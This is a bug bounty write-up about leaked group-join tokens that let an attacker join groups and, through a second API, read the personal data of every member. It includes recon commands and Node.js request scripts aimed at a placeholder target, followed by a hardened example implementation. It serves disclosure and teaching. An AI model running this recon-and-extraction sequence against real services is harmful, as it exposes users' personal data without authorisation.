A Token Leak Can Lead to the Disclosure of a Lot of Users' Personal Data
PII leak
In this post, I want to share how important it is to read JavaScript and to do recon on the target. JavaScript can contain important resources such as DB info, credentials, hidden parameters, hidden APIs, and so on. Recon also helps you understand the target and find hidden points in the application. In this case, I found a hidden point through wide recon and escalated it to 'High' severity using JavaScript.
I have changed specific details about the API and used generic wording, because they must be kept secret for the security of the target. I ask for your understanding.
As usual, I was analyzing the JavaScript manually. While analyzing some API logic in the JavaScript, I found that the target uses a specific token for an application function.
cat host.txt | waybackurls | tee -a all_endpoint.txt
cat host.txt | waymore | tee -a all_endpoint.txt
katana -u target.com -passive -f qurl >> target_endpoint.txt
arjun -u https://target.com >> target_endpoint.txt
To understand the token, I searched for directories and APIs with recon tools. Fortunately, I found some directories that included the specific tokens. I accessed the endpoint right away and was redirected to a page that registers users to a group.
After interacting with the function further, I understood that each token corresponds to a group. So a user can join the group with no authentication, just by using the URL that includes the specific token. In other words, anyone can join the group matching a token without authenticating. The tokens should therefore not be exposed to the public.
I thought this impact was insufficient for the report to be accepted. What can an attacker do after joining the group? So I decided to escalate the severity.
I started searching for and analyzing APIs that use the specific token in the JavaScript. While reading it, I found the /v1/token-function/group/{specific-number}/user API, which takes the specific number of a group. With this API, an attacker can get a lot of personal data of the group's users.
// core-js / regenerator-runtime polyfills: optional on current Node versions.
require('core-js/stable');
require('regenerator-runtime/runtime');
const fetch = require('node-fetch');

// {specific-number} is the group identifier, {search} a search filter and
// {JWT token} the caller's own token; all three are placeholders, not real values.
const url = 'https://target.com/api/v1/token-function/group/{specific-number}/user';
const postData = {
  data: "{search}"
};
const headers = {
  'Content-Type': 'application/json',
  'Authorization': '{JWT token}'
};

// NOTE: node-fetch throws if a GET request carries a body ("Request with GET/HEAD
// method cannot have body"); a payload in the body only goes through with POST.
fetch(url, {
  method: 'GET',
  headers: headers,
  body: JSON.stringify(postData)
})
  .then(response => {
    if (!response.ok) {
      throw new Error(`error: HTTP ${response.status}`);
    }
    return response.json();
  })
  .then(data => {
    console.log(data);
  })
  .catch(error => {
    console.error('fetch error:', error);
  });
To use the API, an attacker needs two things.
[1] The attacker must join the group, because the API uses the 'Authorization' header to check whether the user belongs to the group. Here, the attacker can easily join the group with the specific token.
[2] The attacker must know the specific number representing the group. But here I could not know the number, because I had joined the group directly with the token.
So I searched the API history in Burp Suite to get the specific number of the group and found the /v1/users API.
// core-js / regenerator-runtime polyfills: optional on current Node versions.
require('core-js/stable');
require('regenerator-runtime/runtime');
const fetch = require('node-fetch');

// Returns the caller's own profile, including the groups they joined ({JWT token} is a placeholder).
const url = 'https://target.com/api/v1/users';
const headers = {
  'Authorization': '{JWT token}'
};
fetch(url, {
  method: 'GET',
  headers: headers,
})
  .then(response => {
    if (!response.ok) throw new Error(`error: HTTP ${response.status}`);
    return response.json();
  })
  // the group's specific number is inside this response body
  .then(data => console.log(JSON.stringify(data, null, 2)))
  .catch(error => console.error('fetch error:', error));
With this API, users can see their own data, including data about the groups they have joined. Here, I could find the specific number of the group in the response body.
Finally, using the specific number representing the group, an attacker can get all users' data in the group via the /v1/token-function/group/{specific-number}/user API. In other words, an attacker can get the data of all users in any group that can be joined with the leaked tokens.
It was triaged as CVSS 7.5 and accepted.
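As an added example, not the target's code or the post's own, here is a small Node.js model of the two endpoints described above, with the vulnerable behaviour beside a hardened version: join tokens that are single-use and time-limited, and a group member listing that returns PII only to group admins. The users, roles, token values and group identifiers are constructed assumptions.

```javascript
// Constructed data: three users with PII across two groups. The schema, the
// admin/member roles and all identifiers are assumptions, not the target's model.
const USERS = {
  u1: { id: 'u1', name: 'Alice', email: 'alice@example.com', groups: { g100: 'admin' } },
  u2: { id: 'u2', name: 'Bob',   email: 'bob@example.com',   groups: { g100: 'member' } },
  u3: { id: 'u3', name: 'Carol', email: 'carol@example.com', groups: { g200: 'member' } },
};
// Invite tokens keyed by the value carried in the join URL. 'tok-g100' models the
// leaked design: one static token per group that never expires.
const INVITES = {
  'tok-g100': { groupId: 'g100', expiresAt: Infinity, usesLeft: Infinity },
};

function membersOf(groupId) {
  return Object.values(USERS).filter(u => groupId in u.groups);
}

// Vulnerable join: anyone holding the URL becomes a member, no further check.
function joinVulnerable(userId, token) {
  const inv = INVITES[token], user = USERS[userId];
  if (!inv || !user) return 404;
  user.groups[inv.groupId] = 'member';
  return 200;
}

// Hardened join: same URL shape, but the token is single-use and time-limited, so
// a copy sitting in a web archive or an open directory stops working on its own.
function joinHardened(userId, token, now = Date.now()) {
  const inv = INVITES[token], user = USERS[userId];
  if (!inv || !user || inv.usesLeft < 1 || now > inv.expiresAt) return 404; // one generic answer
  inv.usesLeft -= 1;
  user.groups[inv.groupId] = 'member';
  return 200;
}

// Vulnerable listing (the post's /group/{id}/user): membership is the only check
// and the full records, PII included, go to whoever passes it.
function listVulnerable(callerId, groupId) {
  if (!USERS[callerId]?.groups[groupId]) return { status: 403, body: null };
  return { status: 200, body: membersOf(groupId) };
}

// Hardened listing: membership still required, but PII only reaches group admins;
// plain members (all a join token can ever grant) get id and name.
function listHardened(callerId, groupId) {
  const role = USERS[callerId]?.groups[groupId];
  if (!role) return { status: 403, body: null };
  const project = role === 'admin' ? u => u : u => ({ id: u.id, name: u.name });
  return { status: 200, body: membersOf(groupId).map(project) };
}
```

The two "vulnerable" functions reproduce the gap the report describes (a leaked static URL grants membership, and membership alone unlocks every member's PII); the hardened pair closes both halves independently, so fixing either one already reduces the impact.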
Happy Hacking :)